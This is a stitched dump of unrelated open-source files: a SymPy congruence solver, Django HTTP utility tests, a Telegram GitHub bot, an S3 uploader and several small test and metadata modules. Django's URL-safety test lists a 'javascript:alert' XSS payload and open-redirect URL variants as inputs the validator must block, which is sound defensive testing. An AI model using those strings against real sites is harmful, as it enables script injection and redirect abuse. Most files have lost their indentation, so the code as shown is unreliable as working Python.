    These are the solutions of f(x) = x**2 + x + 7 cong 0 mod(3):
>>> f = [1, 1, 7]
>>> csolve_prime(f, 3)
[1]
>>> [ i for i in range(3) if not (i**2 + i + 7) % 3]
[1]
The solutions of f(x) cong 0 mod(9) are constructed from the
values returned from _raise_mod_power:
>>> x, s, p = 1, 1, 3
>>> V = _raise_mod_power(x, s, p, f)
>>> [x + v * p**s for v in V]
[1, 4, 7]
And these are confirmed with the following:
>>> [ i for i in range(3**2) if not (i**2 + i + 7) % 3**2]
[1, 4, 7]
"""
from sympy.polys.domains import ZZ
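    # Hensel lifting: x + t*p**s solves f mod p**(s + 1) iff t satisfies the
    # linear congruence f'(x)*t == -f(x)//p**s (mod p).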
f_f = gf_diff(f, p, ZZ)
alpha = gf_value(f_f, x)
beta = - gf_value(f, x) // p**s
return linear_congruence(alpha, beta, p)
def csolve_prime(f, p, e=1):
"""
Solutions of f(x) congruent 0 mod(p**e).
Examples
========
>>> from sympy.polys.galoistools import csolve_prime
>>> csolve_prime([1, 1, 7], 3, 1)
[1]
>>> csolve_prime([1, 1, 7], 3, 2)
[1, 4, 7]
    Solutions [1, 4, 7] (mod 3**2) are generated by ``_raise_mod_power()``
    from the solution [1] (mod 3).
"""
from sympy.polys.domains import ZZ
X1 = [i for i in range(p) if gf_eval(f, i, p, ZZ) == 0]
if e == 1:
return X1
X = []
S = list(zip(X1, [1]*len(X1)))
while S:
x, s = S.pop()
if s == e:
X.append(x)
else:
s1 = s + 1
ps = p**s
S.extend([(x + v*ps, s1) for v in _raise_mod_power(x, s, p, f)])
return sorted(X)
def gf_csolve(f, n):
"""
To solve f(x) congruent 0 mod(n).
n is divided into canonical factors and f(x) cong 0 mod(p**e) will be
solved for each factor. Applying the Chinese Remainder Theorem to the
results returns the final answers.
Examples
========
Solve [1, 1, 7] congruent 0 mod(189):
>>> from sympy.polys.galoistools import gf_csolve
>>> gf_csolve([1, 1, 7], 189)
[13, 49, 76, 112, 139, 175]
References
==========
[1] 'An introduction to the Theory of Numbers' 5th Edition by Ivan Niven,
Zuckerman and Montgomery.
"""
from sympy.polys.domains import ZZ
P = factorint(n)
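    # Solve modulo each prime power, then combine every choice of residues
    # with the Chinese Remainder Theorem.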
X = [csolve_prime(f, p, e) for p, e in P.items()]
pools = list(map(tuple, X))
perms = [[]]
for pool in pools:
perms = [x + [y] for x in perms for y in pool]
dist_factors = [pow(p, e) for p, e in P.items()]
return sorted([gf_crt(per, dist_factors, ZZ) for per in perms])
|
outofmem0ry/incubator-hawq | refs/heads/master | tools/bin/pythonSrc/ptyprocess-0.5.1/tests/test_invalid_binary.py | 11 | #!/usr/bin/env python
'''
PEXPECT LICENSE
This license is approved by the OSI and FSF as GPL-compatible.
http://opensource.org/licenses/isc-license.txt
Copyright (c) 2012, Noah Spurrier <[email protected]>
PERMISSION TO USE, COPY, MODIFY, AND/OR DISTRIBUTE THIS SOFTWARE FOR ANY
PURPOSE WITH OR WITHOUT FEE IS HEREBY GRANTED, PROVIDED THAT THE ABOVE
COPYRIGHT NOTICE AND THIS PERMISSION NOTICE APPEAR IN ALL COPIES.
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
'''
import time
import unittest
from ptyprocess import PtyProcess, PtyProcessUnicode
import errno
import os
import stat
import tempfile
class InvalidBinaryChars(unittest.TestCase):
def test_invalid_binary(self):
'''This tests that we correctly handle the case where we attempt to
spawn a child process but the exec call fails'''
# Create a file that should fail the exec call
dirpath = tempfile.mkdtemp()
fullpath = os.path.join(dirpath, "test")
with open(fullpath, 'wb') as f:
# Add some constant so it will never be executable
# - Not 0x54AD (Windows PE)
# - Not 0x7FEF (ELF)
# - Not 0410 or 0413 (a.out)
# - Not 0x2321 (script)
file_start = b'\x00\x00'
file_data = file_start + os.urandom(1022)
f.write(file_data)
# Make it executable
st = os.stat(fullpath)
os.chmod(fullpath, st.st_mode | stat.S_IEXEC)
# TODO Verify this does what is intended on Windows
try:
child = PtyProcess.spawn([fullpath])
# If we get here then an OSError was not raised
child.close()
raise AssertionError("OSError was not raised")
except OSError as err:
if errno.ENOEXEC == err.errno:
# This is what should happen
pass
else:
# Re-raise the original error to fail the test
raise
finally:
os.unlink(fullpath)
os.rmdir(dirpath)
if __name__ == '__main__':
unittest.main()
suite = unittest.makeSuite(InvalidBinaryChars,'test')
|
xwolf12/django | refs/heads/master | tests/utils_tests/test_http.py | 220 | from __future__ import unicode_literals
import sys
import unittest
from datetime import datetime
from django.utils import http, six
from django.utils.datastructures import MultiValueDict
class TestUtilsHttp(unittest.TestCase):
def test_same_origin_true(self):
# Identical
self.assertTrue(http.same_origin('http://foo.com/', 'http://foo.com/'))
# One with trailing slash - see #15617
self.assertTrue(http.same_origin('http://foo.com', 'http://foo.com/'))
self.assertTrue(http.same_origin('http://foo.com/', 'http://foo.com'))
# With port
self.assertTrue(http.same_origin('https://foo.com:8000', 'https://foo.com:8000/'))
# No port given but according to RFC6454 still the same origin
self.assertTrue(http.same_origin('http://foo.com', 'http://foo.com:80/'))
self.assertTrue(http.same_origin('https://foo.com', 'https://foo.com:443/'))
def test_same_origin_false(self):
# Different scheme
self.assertFalse(http.same_origin('http://foo.com', 'https://foo.com'))
# Different host
self.assertFalse(http.same_origin('http://foo.com', 'http://goo.com'))
# Different host again
self.assertFalse(http.same_origin('http://foo.com', 'http://foo.com.evil.com'))
# Different port
self.assertFalse(http.same_origin('http://foo.com:8000', 'http://foo.com:8001'))
# No port given
self.assertFalse(http.same_origin('http://foo.com', 'http://foo.com:8000/'))
self.assertFalse(http.same_origin('https://foo.com', 'https://foo.com:8000/'))
def test_urlencode(self):
# 2-tuples (the norm)
result = http.urlencode((('a', 1), ('b', 2), ('c', 3)))
self.assertEqual(result, 'a=1&b=2&c=3')
# A dictionary
result = http.urlencode({'a': 1, 'b': 2, 'c': 3})
acceptable_results = [
# Need to allow all of these as dictionaries have to be treated as
# unordered
'a=1&b=2&c=3',
'a=1&c=3&b=2',
'b=2&a=1&c=3',
'b=2&c=3&a=1',
'c=3&a=1&b=2',
'c=3&b=2&a=1'
]
self.assertIn(result, acceptable_results)
result = http.urlencode({'a': [1, 2]}, doseq=False)
self.assertEqual(result, 'a=%5B%271%27%2C+%272%27%5D')
result = http.urlencode({'a': [1, 2]}, doseq=True)
self.assertEqual(result, 'a=1&a=2')
result = http.urlencode({'a': []}, doseq=True)
self.assertEqual(result, '')
# A MultiValueDict
result = http.urlencode(MultiValueDict({
'name': ['Adrian', 'Simon'],
'position': ['Developer']
}), doseq=True)
acceptable_results = [
# MultiValueDicts are similarly unordered
'name=Adrian&name=Simon&position=Developer',
'position=Developer&name=Adrian&name=Simon'
]
self.assertIn(result, acceptable_results)
def test_base36(self):
# reciprocity works
for n in [0, 1, 1000, 1000000]:
self.assertEqual(n, http.base36_to_int(http.int_to_base36(n)))
if six.PY2:
self.assertEqual(sys.maxint, http.base36_to_int(http.int_to_base36(sys.maxint)))
# bad input
self.assertRaises(ValueError, http.int_to_base36, -1)
if six.PY2:
self.assertRaises(ValueError, http.int_to_base36, sys.maxint + 1)
for n in ['1', 'foo', {1: 2}, (1, 2, 3), 3.141]:
self.assertRaises(TypeError, http.int_to_base36, n)
for n in ['#', ' ']:
self.assertRaises(ValueError, http.base36_to_int, n)
for n in [123, {1: 2}, (1, 2, 3), 3.141]:
self.assertRaises(TypeError, http.base36_to_int, n)
# more explicit output testing
for n, b36 in [(0, '0'), (1, '1'), (42, '16'), (818469960, 'django')]:
self.assertEqual(http.int_to_base36(n), b36)
self.assertEqual(http.base36_to_int(b36), n)
def test_is_safe_url(self):
for bad_url in ('http://example.com',
'http:///example.com',
'https://example.com',
                        'ftp://example.com',
r'\\example.com',
r'\\\example.com',
r'/\\/example.com',
r'\\\example.com',
r'\\example.com',
r'\\//example.com',
r'/\/example.com',
r'\/example.com',
r'/\example.com',
'http:///example.com',
'http:/\//example.com',
'http:\/example.com',
'http:/\example.com',
'javascript:alert("XSS")',
'\njavascript:alert(x)',
'\x08//example.com',
'\n'):
self.assertFalse(http.is_safe_url(bad_url, host='testserver'), "%s should be blocked" % bad_url)
for good_url in ('/view/?param=http://example.com',
'/view/?param=https://example.com',
                         '/view?param=ftp://example.com',
'view/?param=//example.com',
'https://testserver/',
'HTTPS://testserver/',
'//testserver/',
'/url%20with%20spaces/'):
self.assertTrue(http.is_safe_url(good_url, host='testserver'), "%s should be allowed" % good_url)
def test_urlsafe_base64_roundtrip(self):
bytestring = b'foo'
encoded = http.urlsafe_base64_encode(bytestring)
decoded = http.urlsafe_base64_decode(encoded)
self.assertEqual(bytestring, decoded)
def test_urlquote(self):
self.assertEqual(http.urlquote('Paris & Orl\xe9ans'),
'Paris%20%26%20Orl%C3%A9ans')
self.assertEqual(http.urlquote('Paris & Orl\xe9ans', safe="&"),
'Paris%20&%20Orl%C3%A9ans')
self.assertEqual(
http.urlunquote('Paris%20%26%20Orl%C3%A9ans'),
'Paris & Orl\xe9ans')
self.assertEqual(
http.urlunquote('Paris%20&%20Orl%C3%A9ans'),
'Paris & Orl\xe9ans')
self.assertEqual(http.urlquote_plus('Paris & Orl\xe9ans'),
'Paris+%26+Orl%C3%A9ans')
self.assertEqual(http.urlquote_plus('Paris & Orl\xe9ans', safe="&"),
'Paris+&+Orl%C3%A9ans')
self.assertEqual(
http.urlunquote_plus('Paris+%26+Orl%C3%A9ans'),
'Paris & Orl\xe9ans')
self.assertEqual(
http.urlunquote_plus('Paris+&+Orl%C3%A9ans'),
'Paris & Orl\xe9ans')
class ETagProcessingTests(unittest.TestCase):
def test_parsing(self):
etags = http.parse_etags(r'"", "etag", "e\"t\"ag", "e\\tag", W/"weak"')
self.assertEqual(etags, ['', 'etag', 'e"t"ag', r'e\tag', 'weak'])
def test_quoting(self):
quoted_etag = http.quote_etag(r'e\t"ag')
self.assertEqual(quoted_etag, r'"e\\t\"ag"')
class HttpDateProcessingTests(unittest.TestCase):
def test_http_date(self):
t = 1167616461.0
self.assertEqual(http.http_date(t), 'Mon, 01 Jan 2007 01:54:21 GMT')
def test_cookie_date(self):
t = 1167616461.0
self.assertEqual(http.cookie_date(t), 'Mon, 01-Jan-2007 01:54:21 GMT')
def test_parsing_rfc1123(self):
parsed = http.parse_http_date('Sun, 06 Nov 1994 08:49:37 GMT')
self.assertEqual(datetime.utcfromtimestamp(parsed),
datetime(1994, 11, 6, 8, 49, 37))
def test_parsing_rfc850(self):
parsed = http.parse_http_date('Sunday, 06-Nov-94 08:49:37 GMT')
self.assertEqual(datetime.utcfromtimestamp(parsed),
datetime(1994, 11, 6, 8, 49, 37))
def test_parsing_asctime(self):
parsed = http.parse_http_date('Sun Nov 6 08:49:37 1994')
self.assertEqual(datetime.utcfromtimestamp(parsed),
datetime(1994, 11, 6, 8, 49, 37))
|
haiyangd/python-show-me-the-code- | refs/heads/master | agmcs/0014/0014.py | 40 | #coding:utf-8
import json
import xlwt
with open('student.txt', 'r') as f:
data = f.read().decode('gbk')
data = json.loads(data)
book =xlwt.Workbook(encoding = 'utf-8')
sheet =book.add_sheet('student')
for i in range(len(data)):
d = data[str(i+1)]
sheet.write(i,0,i+1)
for j in range(len(d)):
sheet.write(i,j+1,d[j])
book.save('student.xls')
|
alomina007/github | refs/heads/master | main.py | 1 | import telebot
import urllib
from telebot import types
import requests
import json
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
bot = telebot.TeleBot('') # put your token here
@bot.message_handler(commands=['start', 'help'])
def m(m):
markup = types.InlineKeyboardMarkup()
markup.add(types.InlineKeyboardButton('کانال ما', url = 'https://telegram.me/SuDo_Tm'))
bot.send_message(m.chat.id, 'Hi Welcome \ncommands : \n/git [username]\n\ndeveloper :SuDo™', reply_markup=markup)
print 'bot send help command'
@bot.message_handler(regexp='^(/git) (.*)')
def gif(m):
text = m.text.split()[1]
r = requests.get('https://api.github.com/users/{}'.format(text))
json_data = r.json()
if 'id' in json_data:
url_html = json_data['html_url']
typee = json_data['type']
name = json_data['name']
company = json_data['company']
blog = json_data['blog']
location = json_data['location']
bio = json_data['bio']
public_repos = json_data['public_repos']
followers = json_data['followers']
following = json_data['following']
avatar_url = json_data['avatar_url']
urllib.urlretrieve("{}".format(avatar_url), "git.png")
        bot.send_sticker(m.chat.id, open('git.png', 'rb'))
bot.send_message(m.chat.id, 'Name : <b>{}</b>\nType : <b>{}</b>\nCompany : <b>{}</b>\nblog : <code>{}</code>\nlocation : <b>{}</b>\nbio : <i>{}</i>\n\nUrl : <code>{}</code>\nfollowers : <code>{}</code>\nfollowing : <code>{}</code>\nRepos : <code>{}</code>\n\xE2\x97\xBC \xE2\x97\xBB \xE2\x97\xBC \xE2\x97\xBB \xE2\x97\xBC \xE2\x97\xBB \xE2\x97\xBC'.format(name,typee,company,blog,location,bio,url_html,followers,following,public_repos), parse_mode='HTML')
print 'bot send git command'
if 'message' in json_data:
bot.send_message(m.chat.id, 'Error \n/git [username]')
return
@bot.inline_handler(lambda query: len(query.query.split()) == 1)
def qq(q):
text = q.query
r = requests.get('https://api.github.com/users/{}'.format(text))
json_data = r.json()
if 'avatar_url' in json_data:
url_html = json_data['html_url']
typee = json_data['type']
name = json_data['name']
company = json_data['company']
blog = json_data['blog']
location = json_data['location']
bio = json_data['bio']
public_repos = json_data['public_repos']
followers = json_data['followers']
following = json_data['following']
avatar_url = json_data['avatar_url']
tmp = 'http://ericsteinborn.com/github-for-cats/img/ironcat.png'
gitss = types.InlineQueryResultArticle('1', 'Git username\xE2\x9C\x8F\xEF\xB8\x8F', types.InputTextMessageContent('Name : <b>{}</b>\nUrl : <b>{}</b>\nBlog : <b>{}</b>\nLocation : <b>{}</b>\nBio : <i>{}</i>\n\nRepos : <code>{}</code>\nfollowers : <code>{}</code>\nfollowing : <code>{}</code>'.format(name,url_html,blog,location,bio,public_repos,followers,following), parse_mode="HTML"), thumb_url=tmp)
avatarr = types.InlineQueryResultPhoto('2', '{}'.format(avatar_url), '{}'.format(avatar_url), description='avatar', caption='Name : {}\nUrl : {}\nBlog : {}\nLocation : {}\nBio : {}\n\nRepos : {}'.format(name,url_html,blog,location,bio,public_repos))
bot.answer_inline_query(q.id, [gitss, avatarr], cache_time=1)
bot.polling(True)
|
raishiv/elasticsearch | refs/heads/master | dev-tools/upload-s3.py | 255 | # Licensed to Elasticsearch under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on
# an 'AS IS' BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import os
import sys
import argparse
try:
import boto.s3
except:
raise RuntimeError("""
S3 upload requires boto to be installed
Use one of:
'pip install -U boto'
'apt-get install python-boto'
'easy_install boto'
""")
import boto.s3
def list_buckets(conn):
return conn.get_all_buckets()
def upload_s3(conn, path, key, file, bucket):
print 'Uploading %s to Amazon S3 bucket %s/%s' % \
(file, bucket, os.path.join(path, key))
def percent_cb(complete, total):
sys.stdout.write('.')
sys.stdout.flush()
bucket = conn.create_bucket(bucket)
k = bucket.new_key(os.path.join(path, key))
k.set_contents_from_filename(file, cb=percent_cb, num_cb=100)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Uploads files to Amazon S3')
parser.add_argument('--file', '-f', metavar='path to file',
help='the branch to release from', required=True)
parser.add_argument('--bucket', '-b', metavar='B42', default='download.elasticsearch.org',
help='The S3 Bucket to upload to')
parser.add_argument('--path', '-p', metavar='elasticsearch/elasticsearch', default='elasticsearch/elasticsearch',
help='The key path to use')
parser.add_argument('--key', '-k', metavar='key', default=None,
help='The key - uses the file name as default key')
args = parser.parse_args()
if args.key:
key = args.key
else:
key = os.path.basename(args.file)
connection = boto.connect_s3()
upload_s3(connection, args.path, key, args.file, args.bucket);
|
SF-Zhou/LeetCode.Solutions | refs/heads/master | solutions/letter_combinations_of_a_phone_number.py | 1 | class Solution(object):
table = {'1': '',
'2': 'abc',
'3': 'def',
'4': 'ghi',
'5': 'jkl',
'6': 'mno',
'7': 'pqrs',
'8': 'tuv',
'9': 'wxyz',
'0': ' '}
def letterCombinations(self, digits):
"""
:type digits: str
:rtype: List[str]
"""
ret = ['']
for d in digits:
current = []
for r in ret:
for add in self.table[d]:
current.append(r + add)
ret = current
if ret[0] == '':
ret = []
return ret
|
HumanExposure/factotum | refs/heads/master | factotum/urls/api.py | 1 | from django.conf.urls import url
from django.urls import path, include
from apps_api.core import views as coreviews
from apps_api.api import views as apiviews
from apps_api.core.routers import CustomRelationRouter
from apps_api.openapi import views as docsviews
from factotum import settings
router = CustomRelationRouter()
router.register(r"pucs", apiviews.PUCViewSet, basename="puc")
router.register(r"products", apiviews.ProductViewSet)
router.register(r"dataGroups", apiviews.DataGroupViewSet, basename="dataGroup")
router.register(r"dataSources", apiviews.DataSourceViewSet, basename="dataSource")
router.register(r"dataDocuments", apiviews.DocumentViewSet, basename="dataDocument")
router.register(r"chemicals", apiviews.ChemicalViewSet)
router.register(
r"chemicalInstances", apiviews.ChemicalInstanceViewSet, basename="chemicalInstance"
)
router.register(
r"chemicalpresences",
apiviews.ChemicalPresenceViewSet,
basename="chemical_presences",
)
router.register(
r"functionalUses", apiviews.FunctionalUseViewSet, basename="functionalUse"
)
router.register(r"functionalUseCategories", apiviews.FunctionUseCategoryViewSet)
router.register(r"chemicalpresence", apiviews.ChemicalPresenceTagViewSet)
router.register(r"compositions", apiviews.CompositionViewSet, basename="composition")
router.register(
r"classificationMethods",
apiviews.ClassificationMethodViewSet,
basename="classificationMethod",
)
router.register(r"productToPucs", apiviews.ProductToPucViewSet, basename="productToPuc")
urlpatterns = [
path("openapi.json/", docsviews.OpenAPIView.as_view(), name="openapi-schema"),
path("token/", coreviews.ObtainExpiringAuthToken.as_view(), name="token"),
path("", include(router.urls)),
path("", docsviews.RedocView.as_view()),
# Relationships endpoints
path(
"functionalUses/<pk>/relationships/<related_field>",
view=apiviews.FunctionalUseRelationshipView.as_view(),
name="functionalUse-relationships",
),
path(
"dataDocuments/<pk>/relationships/<related_field>",
view=apiviews.DocumentRelationshipView.as_view(),
name="dataDocument-relationships",
),
path(
"dataGroups/<pk>/relationships/<related_field>",
view=apiviews.DataGroupRelationshipView.as_view(),
name="dataGroup-relationships",
),
# Relationships endpoints chemicalInstance
# For clarity the urls are going to be different but the RelationshipView
# functions the same for all children of the raw chemical model
path(
"compositions/<pk>/relationships/<related_field>",
view=apiviews.ChemicalInstanceRelationshipView.as_view(),
name="composition-relationships",
),
path(
"chemicalInstances/<pk>/relationships/<related_field>",
view=apiviews.ChemicalInstanceRelationshipView.as_view(),
name="chemicalInstance-relationships",
),
# Custom viewset actions
path(
"products/bulk",
view=apiviews.ProductViewSet.as_view(actions={"post": "create_bulk"}),
name="product_csv",
),
path(
"products",
view=apiviews.ProductViewSet.as_view(actions={"post": "create"}),
name="product",
),
path(
"products/<pk>/relationships/<related_field>",
view=apiviews.ProductRelationshipView.as_view(),
name="product-relationships",
),
path(
"productToPucs/<pk>/relationships/<related_field>",
view=apiviews.ProductToPucRelationshipView.as_view(),
name="productToPuc-relationships",
),
path("", include("django_prometheus.urls")),
]
if settings.DEBUG:
import debug_toolbar
urlpatterns = [url(r"^__debug__/", include(debug_toolbar.urls))] + urlpatterns
|
pchretien/ants | refs/heads/master | python/test.py | 1 | ## ants ##
#
# This program simulates an ants colony.
# Copyright (C) 2008,2009 Philippe Chretien
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License Version 2
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# You will find the latest version of this code at the following address:
# http://github.com/pchretien
#
# You can contact me at the following email address:
# [email protected]
from Fourmi import *
from Domaine import *
from Position import *
dt = 1.
dx = 1.
# Domain dimensions
lx = 10
ly = 10
# Location of the food ...
hg = Position(2,2)
bd = Position(2,3)
# Nest
position_du_nid = Position( 5,5 )
# Object managing the source parameter
source = SourceSansEffet(0)
# Domain in which the ant moves
domaine = Domaine( lx, ly, dx, dt, source, hg, bd, 0.02, 10. )
domaine.n[4][4] = 1
domaine.n[5][4] = 2
domaine.n[6][4] = 3
domaine.n[4][5] = 4
domaine.n[5][5] = 0
domaine.n[6][5] = 5
domaine.n[4][6] = 6
domaine.n[5][6] = 7
domaine.n[6][6] = 8
# An ant
fourmi = Fourmi( domaine, position_du_nid, 1, 1 )
fourmi.bouge()
fourmi = Fourmi( domaine, position_du_nid, 1, 1 )
fourmi.mode = 1
fourmi.positionNid = Position(5,3)
fourmi.bouge()
p1 = Position(5,4)
p2 = Position(5,3)
print p1.distance(p2)
|
dycodedev/taiga-back | refs/heads/master | taiga/front/sitemaps/base.py | 14 | # Copyright (C) 2015 David Barragán <[email protected]>
# Copyright (C) 2015 Taiga Agile LLC <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.contrib.sitemaps import Sitemap as DjangoSitemap
class Sitemap(DjangoSitemap):
def get_urls(self, page=1, site=None, protocol=None):
urls = []
latest_lastmod = None
all_items_lastmod = True # track if all items have a lastmod
for item in self.paginator.page(page).object_list:
loc = self.__get('location', item)
priority = self.__get('priority', item, None)
lastmod = self.__get('lastmod', item, None)
if all_items_lastmod:
all_items_lastmod = lastmod is not None
if (all_items_lastmod and
(latest_lastmod is None or lastmod > latest_lastmod)):
latest_lastmod = lastmod
url_info = {
'item': item,
'location': loc,
'lastmod': lastmod,
'changefreq': self.__get('changefreq', item, None),
'priority': str(priority if priority is not None else ''),
}
urls.append(url_info)
if all_items_lastmod and latest_lastmod:
self.latest_lastmod = latest_lastmod
return urls
|
synapse-wireless/pyduino-includes | refs/heads/master | pyduinoincludes/__init__.py | 2 | from io import *
|
timovanopstal/nutils | refs/heads/master | tests/ischeme.py | 1 | #!/usr/bin/env python
from nutils import *
from . import register, unittest
def _test( ref, ptype, target_points, target_weights=None ):
points, weights = ref.getischeme( ptype )
assert points.ndim == 2
assert points.shape[1] == ref.ndims
numpy.testing.assert_almost_equal( points, target_points )
if target_weights is None:
assert weights is None
else:
assert weights.ndim == 1
assert weights.shape[0] == points.shape[0]
numpy.testing.assert_almost_equal( weights, target_weights )
@register
def check():
@unittest
def line():
ref = element.getsimplex(1)
a = numpy.sqrt(1/3.)
b = numpy.sqrt(3/5.)
_test( ref, 'gauss1', [[.5]], [1.] )
_test( ref, 'gauss2', [[.5-.5*a],[.5+.5*a]], [.5,.5] )
_test( ref, 'gauss3', [[.5-.5*a],[.5+.5*a]], [.5,.5] )
_test( ref, 'gauss4', [[.5-.5*b],[.5],[.5+.5*b]], [5/18.,4/9.,5/18.] )
_test( ref, 'gauss5', [[.5-.5*b],[.5],[.5+.5*b]], [5/18.,4/9.,5/18.] )
_test( ref, 'uniform1', [[.5]], [1.] )
_test( ref, 'uniform2', [[.25],[.75]], [.5,.5] )
_test( ref, 'uniform3', [[1/6.],[1/2.],[5/6.]], [1/3.]*3 )
  @unittest
  def quad():
ref = element.getsimplex(1)**2
a = numpy.sqrt(1/3.)
b = numpy.sqrt(3/5.)
_test( ref, 'gauss1', [[.5,.5]], [1.] )
_test( ref, 'gauss2', [[.5-.5*a,.5-.5*a],[.5-.5*a,.5+.5*a],[.5+.5*a,.5-.5*a],[.5+.5*a,.5+.5*a]], [1/4.]*4 )
_test( ref, 'gauss1,4', [[.5,.5-.5*b],[.5,.5],[.5,.5+.5*b]], [5/18.,4/9.,5/18.] )
_test( ref, 'uniform1', [[.5,.5]], [1.] )
_test( ref, 'uniform2', [[.25,.25],[.25,.75],[.75,.25],[.75,.75]], [1/4.]*4 )
_test( ref, 'uniform1,3', [[.5,1/6.],[.5,1/2.],[.5,5/6.]], [1/3.]*3 )
_test( ref, 'uniform1*gauss1', [[.5,.5]], [1.] )
_test( ref, 'uniform2*gauss1', [[.25,.5],[.75,.5]], [.5,.5] )
_test( ref, 'uniform1*gauss2', [[.5,.5-.5*a],[.5,.5+.5*a]], [.5,.5] )
_test( ref, 'uniform2*gauss2', [[.25,.5-.5*a],[.25,.5+.5*a],[.75,.5-.5*a],[.75,.5+.5*a]], [1/4.]*4 )
  @unittest
  def testTriangle():
ref = element.getsimplex(2)
_test( ref, 'gauss1', [[1/3.,1/3.]], [.5] )
_test( ref, 'gauss2', [[2/3.,1/6.],[1/6.,2/3.],[1/6.,1/6.]], [1/6.]*3 )
_test( ref, 'gauss3', [[1/3.,1/3.],[3/5.,1/5.],[1/5.,3/5.],[1/5.,1/5.]], [-9/32.,25/96.,25/96.,25/96.] )
_test( ref, 'uniform1', [[1/3.,1/3.]], [.5] )
_test( ref, 'uniform2', [[1/6.,1/6.],[1/6.,2/3.],[2/3.,1/6.],[1/3.,1/3.]], [1/8.]*4 )
  @unittest
  def testHexagon():
ref = element.getsimplex(1)**3
_test( ref, 'uniform1', [[.5,.5,.5]], [1.] )
  @unittest
  def testPrism():
ref = element.getsimplex(1)*element.getsimplex(2)
_test( ref, 'uniform1', [[.5,1/3.,1/3.]], [.5] )
_test( ref, 'uniform2', [[.25,1/6.,1/6.],[.25,1/6.,2/3.],[.25,2/3.,1/6.],[.25,1/3.,1/3.],[.75,1/6.,1/6.],[.75,1/6.,2/3.],[.75,2/3.,1/6.],[.75,1/3.,1/3.]], [1/16.]*8 )
_test( ref, 'uniform1*gauss2', [[.5,2/3.,1/6.],[.5,1/6.,2/3.],[.5,1/6.,1/6.]], [1/6.]*3 )
|
slightstone/SickRage | refs/heads/master | sickbeard/metadata/kodi_12plus.py | 3 | # URL: http://code.google.com/p/sickbeard/
#
# This file is part of SickRage.
#
# SickRage is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SickRage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SickRage. If not, see <http://www.gnu.org/licenses/>.
import generic
import datetime
import sickbeard
from sickbeard import logger, exceptions, helpers
from sickbeard.exceptions import ex
import xml.etree.cElementTree as etree
class KODI_12PlusMetadata(generic.GenericMetadata):
"""
Metadata generation class for KODI 12+.
The following file structure is used:
show_root/tvshow.nfo (show metadata)
show_root/fanart.jpg (fanart)
show_root/poster.jpg (poster)
show_root/banner.jpg (banner)
show_root/Season ##/filename.ext (*)
show_root/Season ##/filename.nfo (episode metadata)
show_root/Season ##/filename-thumb.jpg (episode thumb)
show_root/season##-poster.jpg (season posters)
show_root/season##-banner.jpg (season banners)
show_root/season-all-poster.jpg (season all poster)
show_root/season-all-banner.jpg (season all banner)
"""
def __init__(self,
show_metadata=False,
episode_metadata=False,
fanart=False,
poster=False,
banner=False,
episode_thumbnails=False,
season_posters=False,
season_banners=False,
season_all_poster=False,
season_all_banner=False):
generic.GenericMetadata.__init__(self,
show_metadata,
episode_metadata,
fanart,
poster,
banner,
episode_thumbnails,
season_posters,
season_banners,
season_all_poster,
season_all_banner)
self.name = 'KODI 12+'
self.poster_name = "poster.jpg"
self.season_all_poster_name = "season-all-poster.jpg"
# web-ui metadata template
self.eg_show_metadata = "tvshow.nfo"
self.eg_episode_metadata = "Season##\\<i>filename</i>.nfo"
self.eg_fanart = "fanart.jpg"
self.eg_poster = "poster.jpg"
self.eg_banner = "banner.jpg"
self.eg_episode_thumbnails = "Season##\\<i>filename</i>-thumb.jpg"
self.eg_season_posters = "season##-poster.jpg"
self.eg_season_banners = "season##-banner.jpg"
self.eg_season_all_poster = "season-all-poster.jpg"
self.eg_season_all_banner = "season-all-banner.jpg"
def _show_data(self, show_obj):
"""
Creates an elementTree XML structure for an KODI-style tvshow.nfo and
returns the resulting data object.
show_obj: a TVShow instance to create the NFO for
"""
show_ID = show_obj.indexerid
indexer_lang = show_obj.lang
lINDEXER_API_PARMS = sickbeard.indexerApi(show_obj.indexer).api_params.copy()
lINDEXER_API_PARMS['actors'] = True
if indexer_lang and not indexer_lang == 'en':
lINDEXER_API_PARMS['language'] = indexer_lang
if show_obj.dvdorder != 0:
lINDEXER_API_PARMS['dvdorder'] = True
t = sickbeard.indexerApi(show_obj.indexer).indexer(**lINDEXER_API_PARMS)
